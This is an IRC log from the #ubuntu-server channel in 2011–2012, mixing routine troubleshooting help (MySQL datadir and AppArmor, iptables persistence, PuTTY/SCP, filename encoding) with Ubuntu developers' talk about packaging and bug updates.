<pedrocr> I just installed ubuntu server 11.04 on a new machine and grub failed to install on the raid array. I have a 4 disk RAID1 for / and a 4 disk RAID6 for /home
<pedrocr> the machine is unbootable, how do I use the rescue disk to boot it and try and install grub again?
<uvirtbot> New bug: #845871 in qemu-kvm (main) "qemu-common cannot be installed because of unsatisfied dependency" [Undecided,New] https://launchpad.net/bugs/845871
<hallyn> eh?
<RoAkSoAx> hallyn: ping
<hallyn> RoAkSoAx: yo
<soren> Daviey, zul: How are those fixes for LXC coming along?
<soren> Openstack+LXC, I mean.
<zul> soren: i have a branch that fixes the shutdown issues, so its going pretty good
<genii-around> Perhaps someone may know here.. token-bucket filter documentation for minburst says "To calculate the maximum possible peakrate, multiply the configured mtu by 100 (or more correctly, HZ, which is 100 on intel, 1024 on Alpha)"... are they talking about bus speed or what?
<zul> soren: i have to buy a new chair tonight though so ill have more fixes tonight hopefully
<soren> zul: Are your patches on LP somewhere?
<zul> soren: https://code.launchpad.net/~zulcss/nova/nova-fix-lxc-shutdown
<soren> zul: ta
<zul> soren: no worries
<genii-around> Ah, nvm, is kernel ticks
<rDx3> glebihan: just to let you know that I finally solved the problem thanks for your precious directions
<glebihan> rDx3, great :) glad I could be of some help
<mister_bubbles> hi guys
<mister_bubbles> i can't start mysqld on ubuntu
<mister_bubbles> no pid file, no sock file, but it either claims it's already started or gives me weird errors
<mister_bubbles> any ideas?
<genii-around> mister_bubbles: What command are you using to try and start it?
<genii-around> eg: upstart method or sysvinit
<mister_bubbles> service mysql start
<mister_bubbles> and start mysql
<mister_bubbles> and  /etc/init.d/mysql start
<genii-around> mister_bubbles: If you use a particular method to start it, use that method to stop or restart it. Otherwise it gets confused because the one method has no record of the pid or sock file the other method uses
<mister_bubbles> i've tried all the methods 5 times
<mister_bubbles> none of them do anything :(
<genii-around> eg: if you use start <something> then don't use /etc/init.d/<something>
<smoser> hallyn, around ?
<smoser> never mind
<genii-around> start <service>  ....  stop <service>  means upstart knows <service> is running, what it's pid and how to handle.  /etc/init.d/<service> start ... /etc/init.d/<service> stop means sysvinit knows those things. But if you start/stop <service>  then: /etc/init.d/<service> start/stop   then it won't work
<mister_bubbles> i originally killed the job using 'kill <pid>'
<sms_> What would be a good way to edit the filesystem remotely from a win7 pc? root ftp isn't I hear :)
<genii-around> sms_: Putty ssh client for windows
<sms_> but I can't copy files from the w7 with putty or can I?
<sms_> I mean move files to the server
<j0nr> hi, how can I install ATI drivers on server edition please? This is for a laptop running server edition that will also run XBMC
<genii-around> sms_: Ah. You said "edit" :) For scp under windows you can use PSCP , same place you get PuTTY from
<sms_> oo thanks :)
<genii-around> sms_: You're welcome
<uvirtbot> New bug: #846057 in cloud-init (main) "cloud-init on oneiric does not honor "ubuntu-pass=*"" [Undecided,New] https://launchpad.net/bugs/846057
<mister_bubbles> argh
<mister_bubbles> my /etc/init.d/mysql start just hangs forever
<mister_bubbles> any ideas?
<mister_bubbles> anyone?
<ikonia> mister_bubbles: try starting mysqld manually, or read the log file
<mister_bubbles> there's nothing in the log files
<mister_bubbles> neither error.log nor syslog
<mister_bubbles> just termination notice and respawn notice
<mister_bubbles> and i tried starting it manually in every way known to me (/etc/init.d/mysql start, service mysql start, start mysql)
<mister_bubbles> it just hangs there
<mister_bubbles> or do you have another way of starting it manually?
<mister_bubbles> hu, interesting. when I do just 'mysqld', I get:
<mister_bubbles> mysqld
<mister_bubbles> 110909 15:14:02 [Warning] The syntax '--log_slow_queries' is deprecated and will be removed in MySQL 7.0. Please use '--slow_query_log'/'--slow_query_log_file' instead.
<mister_bubbles> 110909 15:14:02 [Warning] Can't create test file /mysql/mysql/ip-10-114-95-171.lower-test
<mister_bubbles> 110909 15:14:02 [Warning] Can't create test file /mysql/mysql/ip-10-114-95-171.lower-test
<mister_bubbles> mysqld: Can't change dir to '/mysql/mysql/' (Errcode: 2)
<mister_bubbles> 110909 15:14:02 [ERROR] Aborting
<mister_bubbles> 110909 15:14:02 [Note] mysqld: Shutdown complete
<ikonia> mister_bubbles: look at the init script and how it launches mysqld_safe
<mister_bubbles> it does 'start mysql'
<mister_bubbles> which gives me: start: Rejected send message, 1 matched rules; type="method_call", sender=":1.10" (uid=1000 pid=9616 comm="start) interface="com.ubuntu.Upstart0_6.Job" member="Start" error name="(unset)" requested_reply=0 destination="com.ubuntu.Upstart" (uid=0 pid=1 comm="/sbin/init"))
<ikonia> mister_bubbles: that's using the upstart script
<ikonia> mister_bubbles: I suggested starting it manually, but using the same method of launching mysqld_safe
<mister_bubbles> well, how do i manually start it?
<ikonia> read the init script and see how it launches mysqld follow that through manually
<mister_bubbles> that's what i just did
<mister_bubbles> it uses start
<mister_bubbles> when I type mysqld_safe, i get: 110909 15:30:25 mysqld_safe Logging to syslog.
<mister_bubbles> 110909 15:30:25 mysqld_safe Starting mysqld daemon with databases from /mysql/mysql
<mister_bubbles> 110909 15:30:26 mysqld_safe mysqld from pid file /mysql/mysql/ip-10-114-95-171.pid ended
<mister_bubbles> but then its not running with ps aux
<ikonia> mister_bubbles: is your database in /mysql/mysql ?
<mister_bubbles> i guess so, i don't know
<ikonia> mister_bubbles: checking is a good start.....
<mister_bubbles> my.cnf -> datadir says so
<mister_bubbles> is that the right one?
<ikonia> mister_bubbles: the data dir is /mysql ?
<mister_bubbles> it is /mysql/mysql
<ikonia> mister_bubbles: so are your databases there ?
<ikonia> (ubuntu doesn't put them in /mysql/mysql by default so someones changed that)
<mister_bubbles> there are some files there
<mister_bubbles> where are they usually?
<mister_bubbles> there's some ib_logfiles and ibdata and stuff
<ikonia> so there is some data there, who setup this machine ?
<mister_bubbles> i don't know, somebody in the company i guess
<ikonia> mister_bubbles: look for some MYD or MYI files in there
<mister_bubbles> no, nothing
<mister_bubbles> theres debian-5.1.flag, ibdata1, ib_logfile0, ib_logfile1, mysql folder (empty) and mysql_upgrade_info
<ikonia> mister_bubbles: that's why it's not starting up
<ikonia> mister_bubbles: or at least one of the problems, no database files in there
<mister_bubbles> hu
<mister_bubbles> how are they called? myd?
<mister_bubbles> maybe i shall find for themn
<ikonia> I've just told you the extensions
<mister_bubbles> find / finds no such thing
<mister_bubbles> neither myd nor myi
<ikonia> look at the case
<mister_bubbles> ah
<mister_bubbles> there are some in /mnt/mysql/msql
<ikonia> what an odd place
<mister_bubbles> hm
<mister_bubbles> well
<mister_bubbles> i changed the path in my.cnf to /mnt/mysql/mysql, still doesn't start
<ikonia> mister_bubbles: what's the error this time
<mister_bubbles> 110909 15:47:49 mysqld_safe Logging to syslog.
<mister_bubbles> 110909 15:47:49 mysqld_safe Starting mysqld daemon with databases from /mnt/mysql/mysql
<mister_bubbles> 110909 15:47:49 mysqld_safe mysqld from pid file /mnt/mysql/mysql/ip-10-114-95-171.pid ended
<mister_bubbles> same as last time but with /mnt in front
<ikonia> hang on - please show me the output of ls -la /mnt/mysql/mysql
<ikonia> (use a pastebin)
<mister_bubbles> http://pastebin.com/hMak0SUR
<ikonia> mister_bubbles: it's the wrong dir, thats the data dir for the mysql database specfically
<ikonia> mister_bubbles: try /mnt/mysql
<ikonia> mister_bubbles: the person who set this up needs shooting
<mister_bubbles> http://pastebin.com/gCcEyhte
<mister_bubbles> whys, whats wrong?
<ikonia> mister_bubbles: that's a better directory
<mister_bubbles> so you have any ideas why it won't start?
<ikonia> paste the current error please.
<mister_bubbles> well, when i do what? mysqld_safe?
<mister_bubbles> 110909 15:59:05 mysqld_safe Logging to syslog.
<mister_bubbles> 110909 15:59:05 mysqld_safe Starting mysqld daemon with databases from /mnt/mysql/mysql
<mister_bubbles> 110909 15:59:05 mysqld_safe mysqld from pid file /mnt/mysql/mysql/ip-10-114-95-171.pid ended
<ikonia> mister_bubbles: I told you to change the directory
<ikonia> mister_bubbles: it should be /mnt/mysql
<mister_bubbles> ah you mean trying it in the config
<mister_bubbles> ok doing that now, sec
<mister_bubbles> yay, it's running :D
<mister_bubbles> thx
<mister_bubbles> but the DB is kinda weird
<mister_bubbles> i think it's the wrong one
<ikonia> that's up to the guy who maintained the server
<ikonia> but I'd shoot him for that mess
<Daviey> soren: There seems to have been some fixes landed in Essex already that haven't been proposed to Diablo.
<uvirtbot> New bug: #846104 in mysql-5.1 (main) "package mysql-client-5.1 (not installed) failed to install/upgrade: trying to overwrite '/usr/bin/mysql_client_test', which is also in package mysql-bench 5.0.92-2" [Undecided,New] https://launchpad.net/bugs/846104
#ubuntu-server 2011-09-10
<pmatulis> anybody else stuck trying to install 64bit server beta?  the main menu appears and you can't select anything, keeps coming back to 'Configure the clock'
<dravekx> anyone know a good link on how to jail users to their home directories via sftp/ssh?
<pmatulis> sounds mean
<dravekx> join openssh
<dravekx> ugh
<lajjr> kim0, are online?
<pmatulis> the server beta is seriously borked
<dravekx> borked?
<jmarsden> dravekx: http://en.wiktionary.org/wiki/bork
<dravekx> heh
<dravekx> works fine for me. I guess it depends on what you are doing.
<hydruid> why am i banned from #ubuntu
<dravekx> hydruid it might require that you login or else you did something deserving?
<hydruid> i did nothing wrong
<jrwr> Having some issues with mod_dav_svn, Windows 7 Refuses to mount the repo as a webdav folder, Running Ubuntu 11.04 with Apache/2.2.17; Apache logs say nothing about any errors, windows just comes back with "the parameter is incorrect"
<emaula> using apache2, i can access my site in firefox at localhost:80, after changing the ports.conf file to listen on port 8080, i get the 404 error The requested URL / was not found on this server. Apache/2.2.17 (Ubuntu) Server at 64.250.218.71 Port 8080
<emaula> firewall and routing are correct
<jrwr> I know it sounds strange, add a Listen 8080 at the top of your default sites-enabled
<emaula> ok will try that
<emaula> you are right
<emaula> and that is strange
<emaula> thanks
<jrwr> make sure its still not listening on port 80
<ratstick> If I were looking for a channel to have someone run a port scanner against my ubuntu server and make security recommendations - would this be it?
<quentusrex> Anyone know of a good channel to talk about proper setup of redundant email systems?
<rDx3> glebihan: are you there?
<uvirtbot> New bug: #846365 in samba (main) "package winbind 2:3.4.7~dfsg-1ubuntu3.7 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/846365
<tohuw> Ubuntu Server 11.04, Samba: I've created the [homes] shares, with browsable set to no and nothing set for "valid users". The goal here is that anytime a user is on this network, they can access their home share, but it will still prompt for a password. Which it does. My problem is I don't know what domain to use with the username. I know I'm using the right linux username and password, but every domain I try causes rejection
<uvirtbot> New bug: #846486 in bind9 (main) "package bind9 1:9.7.3.dfsg-1ubuntu2.2 failed to install/upgrade: sub-processo script post-installation instalado retornou estado de saÃ­da de erro 1" [Undecided,New] https://launchpad.net/bugs/846486
<T3CHKOMMIE> hey guys, i have a question. its not a ubuntu sever one but ive been all over IRC channels and this has been the only channel i can reach somone that is competent and not douchey.... its about changing the default jframe java icon. i have been workin on this for 8 horus in netbeans cant get the damn thing to change :( help?
<hydruid> randomuser, i'm in both channels, whats your firewall question
<randomuser> i'm trying to figure out where persistent rules are stored
<hydruid> randomuser, are you using ufw?
<randomuser> the 'community documentation' i found suggested that there is no default file for a ruleset
<randomuser> no, just /sbin/iptables
<hydruid> randomuser, with my understanding with iptables, there is no "static file with rules"
<randomuser> i dont need help configuring the rules, just ensuring they are persistent
<hgb^harry> you need to write a script with the rules in it
<hydruid> ^^
<uvirtbot> hydruid: Error: "^" is not a valid command.
<randomuser> hrmm
<randomuser> i suppose I'll just add something to rc.d with iptables-restore <
<randomuser> on ufw, i don't see the point of learning a second syntax to administer iptables
<hydruid> randomuser, it's a personal preference, I think it's easier
<qman__> I create an iptables script and put it in if-up.d
<randomuser> that makes sense.
<qman__> it works well with DHCP and port forwarding setups
<qman__> I have a static IP now, but when I wrote it, that's why I did it that way
<randomuser> qman__, meaning you had an external interface and an internal interface, and you only wanted the kernel to be bothered with rules for active interfaces?
<qman__> I actually have four interfaces, and the firewall is irrelevant until the internet interface comes online
<sms_> cp -r -v /media/trucky/* /home/sms/music through putty resulted in Ã¥Ã¤Ã¶ getting messed up, like this:  AaveenpÃ¤Ã¤ -> AaveenpÃÂ¤ÃÂ¤
<sms_> where might the problem be?
<Pici> Sometimes weird control characters echoed to the terminal can result in odd effects on the terminal itself.  Try entering 'reset' on your terminal and see if it fxes it.
<sms_> It still reads the filenames wrong. But I retyped one filename through winscp, and that name has question marks: Rytmih?iri?
<sms_> I meant renamed
<qman__> the latter is most likely because of windows
<qman__> linux can have files named literally anything, but windows can't
<qman__> as for the first one, are you crossing filesystems?
<sms_> yeah /media/trucky is a 20gb ntfs usb hard drive
<qman__> windows' idea of non-english characters is different from unicode
<qman__> that's why
<sms_> I see
<sms_> damn
<qman__> bytewise, the names are identical
<qman__> they are simply interpreted different on each system
<sms_> Any idea how I could fix the Rytmih?iri? thing?
<sms_> Also if I type Ã¶ in the putty window, it doesn't show up until I press something else too
<qman__> check on the local machine to see if that's just a failed representation, or the actual name
<qman__> if it's been changed to the actual ? character, it's not undoable
<qman__> if it hasn't, it's just a failure to translate in winscp
<sms_> WinSCP sees it as RytmihÃ¤iriÃ¶
<sms_> putty as Rytmih?iri?
<qman__> ah
<qman__> then the filenames are not themselves mangled
<qman__> they're either in windows or unicode, can't really tell which at this point
<qman__> this has been a fairly long standing problem, so I assume there is probably some software that can convert the two
<qman__> but I don't know of one off hand
<Henriquez> Hi everyone can someone mention an alternative for OCS inventory? > http://www.ocsinventory-ng.org/en/
<sms_> Well this is weird, I can cd into RytmihÃ¤iriÃ¶ and Rytmih?iri?
<sms_> sms@2xc:~/music/RytmihÃ¤iriÃ¶$ but both show up as this
<qman__> it's even more confusing now because windows can be coerced into using unicode
<qman__> so sometimes it is, and sometimes it isn't
<sms_> The folder was Renamed through winSCP
<sms_> Damn
<sms_> But when I press Ã¶ in putty, it doesn't show up. But if I press k after that, only Ã¶ shows up. Then if I press l, Ã¶kl shows up
<sms_> Any idea what's whit that
<qman__> it's always fun when I rip CDs which have song names that use ? in them, and then try to browse them on a windows machine, only to get some random string of characters
<qman__> which may or may not be usable
<qman__> that I couldn't tell you, it's going to either be a font thing, a putty thing, or a terminal version thing
<qman__> well, terminal type
<sms_> Maybe I'll stop listening to scandinavian music..
<qman__> nah, it happens with all kinds
<qman__> better solution is to stop using windows
<qman__> then the problem goes away
<sms_> True
<qman__> I have run into a couple problems with NFSv3, but NFSv3 is _old_
<qman__> and really should be used anyway
<qman__> shouldn't*
<sms_> If I could put the server and my pc in the same subnet I wouldn't have this problem though..
<sms_> But then other family members can't use msn messenger
<qman__> people still use that?
<sms_> Still somewhat popular in Finland
<qman__> fair enough
<sms_> I wish everyone used irc :-|
<qman__> heh, yeah
<Myrtti> filesystems and network sharing protocols treat non-ascii characters differently
<qman__> in the US, facebook has taken over all the other IM softwares
<ersi> which is even more pathetic imo
<qman__> yep
<j0nr> I am trying to set my sevrer up to run xbmc. I need to get some sort of X server installed and get my graphcs card drivers working.... having problems! I tried installing the Catalyst but its not working... now I cant remove it
<ersi> 1) How did you install Catalyst drivers? 2) What's the exact problem, consequence? 3) What are you not able to remove?
<ersi> I can probably not help you, but someone else who reads might be able to - if you provide more information
#ubuntu-server 2011-09-11
<Gasseus> Umm... for whatever reason, I'm having difficulty running php stuff on my apache install. For the root directory, I'm getting http-500 errors, for the install/ directory, i'm getting 403-NOT-AUTHORIZED errors... help?
<xczxcxzcz> hey
<xczxcxzcz> i got a pretty good server question
<xczxcxzcz> but i just cant find out any info anywhere
<xczxcxzcz> in terms of performance with todays i7 xeons and i7 desktops
<xczxcxzcz> say we took  2 x dual core i7 xeons and 1 i7 quad core desktop cpu
<xczxcxzcz> both same clock
<xczxcxzcz> same ram etc
<xczxcxzcz> and we ran a program that fully utilizies multiple cpu usage and full cache etc
<xczxcxzcz> which would perform better?
<xczxcxzcz> i say the server system
<xczxcxzcz> instead of having 4 cores limited on 1 die and restricted with the cache, as opposed to the server board having cache per 2 cores
<xczxcxzcz> however there's also the latency issue which somebody else mentioned but i don't believe htat it would be that much of a impact compared to 2 cpu's on a serverboard pshyically
<xczxcxzcz> anybody alive?
<Gallo> hello all...
<Gallo> anyone looking in ?
<Myrtti> to a certain degree I'm sure
<Gallo> "iwconfig wlan0 essid "<name_of_router>" key "<encryption_key>" ------- > gives me error for wireless request " Set Encode" (8ba2) can someone help?
<Gallo> lol
<Myrtti> what kind of a network are you trying to connect to?
<Gallo> noob at linux, wireless home
<Myrtti> WPA, WEP...?
<Gallo> wep
<Gallo> entered all the right info but get that error I posted......benn trying to set this up  for quite a while lol
<Gallo> *been
<Myrtti> Gallo: oh, sorry, I don't do WEP at all :-/
<Gallo> aight thnx any way mamn
<Gallo> man
<Myrtti> ;-) sure
<Sebo> hi! Could you tell me how can I set up some program to run at tty console and to not require the user to sign in.
<ServerTech> Help : Even on second try, the dang installer does not continue after 5% during select and install software, even though i never really did select any software?:/ Ubuntu 11.04 Server.
<pmatulis> ServerTech: how does it crash/end?  if you can, inspect the logs
<ServerTech> pmatulis: nope it never crashes and/or ends.
<pmatulis> ServerTech: well, what happens after the 5% then?
<ServerTech> pmatulis: nothing. nothing at all. just gets stuck.
<pmatulis> ServerTech: get to a console and inspect the logs
<ServerTech>  +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<ServerTech> sorry
<ServerTech> ..
<uvirtbot> New bug: #801002 in lxc (main) "Provide a default network and configurations" [Medium,New] https://launchpad.net/bugs/801002
<RoyK> oops http://paste.ubuntu.com/687000/
<hydruid> RoyK, lol
<uvirtbot> New bug: #847201 in mysql-5.1 (main) "package mysql-server-core-5.1 (not installed) failed to install/upgrade: defektes Tar-Dateisystem - Paketarchiv ist defekt" [Undecided,New] https://launchpad.net/bugs/847201
<jvargas> hi
<jvargas> I just moved /var/lib/mysql to /srv/mysq
<jvargas> and now service doesnt start, syslogs says:
<jvargas> [521623.740549] type=1400 audit(1315773405.737:29): apparmor="DENIED" operation="mknod" parent=1 profile="/usr/sbin/mysqld" name="/home/srv/mysql/mizard.lower-test" pid=15920 comm="mysqld" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
<jvargas> how can I proceed to make mysql work under a different path?
<oCean> jvargas: in /etc/mysql there is a my.conf wich has several config options, one being   datadir = /var/lib/mysql
<jvargas> oCean: I fixed it by editing some apparmor settings it had defined for mysqld
<jvargas> the problem was apparmor
<mcl0vin> howdy folks
<mcl0vin> i have been batling with lm-sensors to get it to work with my Dell power Edge 860 server , can some one assist me please
<iggi_> After installing Ubuntu-Server 11.04 64 bit on a server I have, it loads to a black screen, however ctrl+alt+del will process a reboot and the screen comes back immediately. Any ideas?
<lifeless> hit enter
<iggi_> Does not do anything
<lifeless> does alt-F1/F2 etc get you anywhere?
<iggi_> let me check, I just rebooted it
<iggi_> lifeless, yes, I was able to get a ocnsole login with ALT-F1
<iggi_> I used a different installer this time. I did a PXE boot and chose Basic Ubuntu Server and OpenSSH as my packages. I didn't think that would install a GUI too
<iggi_> any way to make tty1 default at boot?
#ubuntu-server 2012-09-03
<aarcane> is it possible to use vmbuilder yet, to install releases of ubuntu newer than the current release of the host?
<aarcane> so I converted a few of my images to qed for the trim support.  I'm trying to get it working (on ubuntu 12.04), and running into an issue.  using ide, virtio, sata, I get the error FITRIM ioctl failed: Operation not supported.  When I try to use a scsi disk, the VM just won't boot.
<pmp6nl> Hey everyone, I was setting up some ssh keys and I think I did it wrong.  Is there a good way to reverse what I did? Can I just delete /.ssh/uploaded_key.pub?
<pmp6nl> Thanks
<aarcane> pmp6nl, look at the file, delete the offending entry.
<aarcane> pmp6nl, also examine .ssh/authorized_keys
<pmp6nl> aarcane, ok thanks
<aarcane> pmp6nl, if this is the ONLY key you've copied, youj can delete both files.
<pmp6nl> aarcane, would it hurt to leave them alone and just not use them?
<aarcane> when you attempt to connect with a key, sshd checks .ssh/authorized_keys, so you can't not use that file.
<patdk-lap> there is an option to not store new entries in there, but that really hampers security
<pmp6nl> aarcane, I am assuming I now have two keys. Or maybe confusing myself. I was following http://library.linode.com/linux-tools/rdiff-backup#sph_add-and-configure-a-backup-user and I did this on the remote server instead of my laptop
<aarcane> each key is a single line in authorized_keys.  If you want to remove the offending file, or remove and recreate the file, it should be a simple matter.
<pmp6nl> ok aarcane let me take a look at the file
<aarcane> patdk-lap, are you talking about the new openssh certificate authorty stuff?
<patdk-lap> no, I read that all wrong, I was thinking of knownkeys
<linocisco> hi all, I have Canon LJ3050 USB printer, I want to make it network printer and share it for windows client. I want to know how to. I also want to know if I need to make my windows machine as workgroup or join linux domain
<aarcane> linocisco, it should be a simple matter of configuring the printer in cups, then sharing it in samba.
<aarcane> linocisco, as for adding drivers, that's a bit more nightmarish, and you're better off just installing drivers automatically if you can.
<aarcane> Workgroup and Domain are unnecessary, but you SHOULD add user accounts for users.  Just make the linux user account and samba password match the windows user account and password,and you should be fine.
<pmp6nl> aarcane, not sure, the scp command worked, but those files appear to be empty
<pmp6nl> can I just delete the user?
<pmp6nl> Hello everyone, I am trying to use ssh-copy-id user@remote.example.com but I am missing something it keeps asking me for my "Enter passphrase for key '/home/rdiffbackup/.ssh/id_rsa': "  ideas? Thanks
<pmp6nl> go it
<pmp6nl> got it
<linocisco> aarcane, hi
<linocisco> aarcane, should we install drivers on ubuntu server and windows machine? or just on ubuntu server ?
<linocisco> hi all, my ubuntu server 12.04 on HP DC7100 has small fonts. I dont know how to make it readable for my eyes meaning to enlarge fonts. According to my known experience, I found fonts are so small with higher PCs
<linocisco> i want to set my fonts permanently large enough. not with a command to run everytime after log in
<linocisco> hi all, I found this https://help.ubuntu.com/community/CanonCaptDrv190?action=show&redirect=HardwareSupportComponentsPrinters%2FCanonPrinters%2FLBP3010 to installl my LBP3050 on ubuntu. but Mine is ubuntu-server, could anyone advice me how to?
<MTecknology> Sep  3 02:10:37 luxor kernel: [38753.609704] [UFW BLOCK] IN=eth0 OUT= MAC=02:80:d7:dc:ff:f3:00:0c:dc:f4:43:00:08:00 SRC=64.175.212.151 DST=147.54.168.23 LEN=204 TOS=0x00 PREC=0x00 TTL=51 ID=0 DF PROTO=AH SPI=0x75d6d5d
<MTecknology> How would I allow something like that through ufw?
<pmp6nl> holy crap. ANy idea how to undo a chown -R ?
<MTecknology> pmp6nl: you get to go through and change it for every single file ore go back to a backup
<pmp6nl> ok MTecknology .  As an aside do you know a gui for rdiff-backup that will allow a remote server to be the source?
<MTecknology> a gui?
<MTecknology> what's a gui?
<uvirtbot> New bug: #1045194 in samba (main) "usershares created in nautilus not working" [Undecided,New] https://launchpad.net/bugs/1045194
<jamespage> SpamapS, when you start today please could you give me an opinion on bug 1000605
<uvirtbot> Launchpad bug 1000605 in mysql-5.1 "innotop is not working (misses Term/ReadKey.pm)" [Unknown,Fix released] https://launchpad.net/bugs/1000605
<jamespage> it feels like the 'Suggests' relation for the missing dependency is not really strong enough but wanted you take on it
<jamespage> Daviey, roaksoax: is bug 975468 on the list for maas features for 12.10?
<uvirtbot> Launchpad bug 975468 in maas "consider implementing a 'security group' functionality" [High,New] https://launchpad.net/bugs/975468
<uvirtbot> New bug: #1000605 in mysql-5.1 (main) "innotop is not working (misses Term/ReadKey.pm)" [Unknown,Fix released] https://launchpad.net/bugs/1000605
<koolhead17> Daviey: ping
<cking> will the quantal server ISO images support UEFI?
<cking> no worries, I figured it out myself
<koolhead17> https://bugs.launchpad.net/ubuntu/+source/resolvconf/+bug/1000244
<uvirtbot> Launchpad bug 1000244 in resolvconf "/etc/resolv.conf symlink does not exist after initial installation of resolvconf package" [Undecided,Incomplete]
<koolhead17> this issue is still in 12.04
<koolhead17> i wonder why its marked Incomplete along with so many logs already provided
<Daviey> koolhead17: hey
<koolhead17> Daviey: how are you sir?
<Daviey> koolhead17: ok!
<koolhead17> lynxman: how is Puppet treating you sir :P
<lynxman> koolhead17: I don't know :)
<koolhead17> lynxman: w00t. i thought your nose was deep inside it
<lynxman> koolhead17: not really ;)
<koolhead17> lynxman: what are you playing with?
<sarthor> Hi, can i clone a bootable USB of 8GB to another USB Flash of 8GB, the USB flash drive have win7 isntaller, LinuxMInt installer, acronics, MiniPE,NTpassword OSes, Is it possible with dd command, And how the command wil be?
<soren> Daviey: python-quantumclient has grown a new dependency. I can just go ahead an upload it if you want, but if you'd rather wait until after beta freeze that's cool too.
<soren> Daviey: It's cliff-tablib which adds some more formatters for the cli tools. Tests for a change in python-quantumclient introduced the dependency. It's not strictly required at runtime.
<soren> (but without it, you won't be able to get the quantum cli tools to output json)
<Daviey> soren: no, upload it, we'll at least get it in universe, ready for the next snapshot on friday
<Daviey> i've heard of cliff-tablib ..
<Daviey> I think zul noted it end of last week, but i don't think he hs packaged it yet, soren
<soren> Ok.
 * soren uploads
<soren> Daviey: Oh, it's already there.
<soren> Daviey: I missed it because I was looking for python-cliff-tablib, not cliff-tablib.
<Daviey> ah, i knew i heard of it recently :)
<jibel> Is cdromupgrade still a supported feature in Quantal with the switch to squashfs install ?
<Daviey> jibel: Good question :).  Is it something you ever tested? :)
<xnox> there is no package pool... but it could do ubiquity style cdromupgrade: reinstall all packages preserving /etc, /home & friends.
<jibel> Daviey, I tested offline server upgrade for LTS. It doesn't really make sense for releases in-between IMO, I'm not sure many sysadmins plays with upgrading their DC every 6 months.
<Daviey> xnox: that is why i immediately didn't say no. :)
<xnox> Daviey: note that ubiquity calls is "reinstall preserving user data" not upgrade ;-)
<Daviey> jibel: Maybe i am wrong.. I find upgrade from cd not very interesting TBH.  Either upgrade from network, or re-install if you have a cd to hand.
<xnox> Based on comments from slangasek, I understood that that quantal & up will only support network upgrades.
<xnox> unless you manually yourself use something like aptoncd and similar to create an "offline" archive.
<xnox> and upgrade using that.
<Daviey> xnox: oh, well.. if slangasek is offering support for any of the options, i'll leave that alone. :)
<xnox> while cdrom upgrade case is useful, it's not that interesting =)
<soren> xnox: Funny. I consider it interesting, but not that useful :)
<Daviey> soren: +1
<soren> TypeError: cannot concatenate 'str' and 'int' objects
<soren> Or is this suddenly #php?
<xnox> soren: True
 * soren ducks
 * Daviey takes the garbage out.  import gc ; gc.enable() ; gc.collect(soren)
<soren> Rude
<cwillu_at_work> soren, it's okay, there's still references to you, so the collect was a no-op
<SpamapS> jamespage: FYI, today is a US holiday.
<jamespage> SpamapS, yeah - sorry - Daviey pointed that out to me
<jamespage> SpamapS, ignore me for today
<jamespage> :=)
<soren> SpamapS: orly? That explains rather a lot, actually.
<SpamapS> jamespage: no worries. re bug 1000605 , I think its worth fixing in precise... it will confuse quite a few peopl as suggests are almost invisible.
<uvirtbot> Launchpad bug 1000605 in mysql-5.1 "innotop is not working (misses Term/ReadKey.pm)" [Unknown,Fix released] https://launchpad.net/bugs/1000605
<SpamapS> soren: "Labor Day"
<jamespage> SpamapS, so we should push that to a direct Depends then?
<SpamapS> a day where we honor all workers by sitting on our butts and drinking all day :)
<SpamapS> jamespage: yeah, its clearly a depends.
<jamespage> SpamapS, we have a couple of other q targetted mysql bugs - lets catchup on them tomorrow when you are actually working :-)
<jamespage> nothing urgent - I've just been reviewing release bug lists... :-)
<SpamapS> jamespage: innotop, btw, will become its own package after wheezy releases http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=660164
<uvirtbot> Debian bug 660164 in wnpp "ITP: innotop -- monitor MySQL in real time" [Wishlist,Open]
<sbeattie> Daviey: is keystone going to get promoted from precise-proposed today?
<SpamapS> jamespage: I'd love to try and get the test suite passing 100% for ARM
<jamespage> SpamapS, +1
<Daviey> SpamapS: Are you doing any SRU today?  Someone wants to base an upload on one of the packages?
<SpamapS> Wednesday is my usual SRU day
<mgw> Does anyone know if Duncan McGreggor (or anyone else that may know about txaws) is on here?
<Daviey> SpamapS: well, as you ar here. :).. would you mind ack'ing or nack'ing an express upload based on keystone?
<Daviey> SpamapS: it's been in 9 days.. and seems to be jolly good quality.
<SpamapS> Daviey: ahh, so this is -> updates ?
<Daviey> SpamapS: yeah
<Daviey> SpamapS: that'll then let sbeattie base a further update on it... only keystone.  Other stuff can wait till tomorrow
<SpamapS> Daviey: they all are marked as verified. Do you specifically want me to wait for the others, or just don't want me to spend holiday time on scanning the test logs? ;)
<SpamapS> Daviey: because I'd actually rather that they all hit updates at the same time, given that the CI lab tested them all together.
<SpamapS> Daviey: but, I don't want to split hairs.. I will defer to you guys as to what is best.
<Daviey> SpamapS: I'd be happy for them all to be published now TBH :)
<Daviey> but i was aware that i'm borrowing time :)
<SpamapS> Daviey: nova is only 5 days old...
<SpamapS> honestly, with the level of CI here..
<SpamapS> I think its worth waiving those last 2 days
<Daviey> SpamapS: I'm happy with that :)
<SpamapS> Daviey: full steam ahead
<Daviey> \o/
<Daviey> sbeattie: ^ You are good to go.
<SpamapS> takes a bit to get those copies done
<Daviey> Thanks for checking sbeattie, and thanks for processing today SpamapS
<sbeattie> SpamapS, Daviey: thanks
<SpamapS> NP
<sbeattie> SpamapS: no worries, I have a bit to do on my end, before I can get to my keystone update.
<SpamapS> hrm.. timeout..
<SpamapS> Weird, nova times out
<SpamapS> but keystone is on its merry way to updates
<SpamapS> Daviey: ok, glance, nova, keystone, and horizon have all been pushed to -updates
<sbeattie> SpamapS: awesome, thanks
<SpamapS> np
<Daviey> ta
<aarcane> So I want to set up my backstore for disk images in such a way that the host running VMs can continue to run VMs when the storage backstore is down indefinitely, or until some temporary holding disk is full at least.  What's the best way to set this up ?
<sbeattie> Daviey: FYI, keystone update for precise has been published
<Daviey> sbeattie: woot
<Daviey> I can feel secure at last. :)
<sbeattie> hehe
<sternfan2012> any Edubuntu admins out there?
<Psi-Jack> sternfan2012: What's that got do with servers?
<ogra_> Psi-Jack, likely because edubuntu is a thin client server distro
<ogra_> sternfan2012, try #edubuntu
<Psi-Jack> is it? I thought it was a distro with educational software or some-such on it.
<ogra_> that too
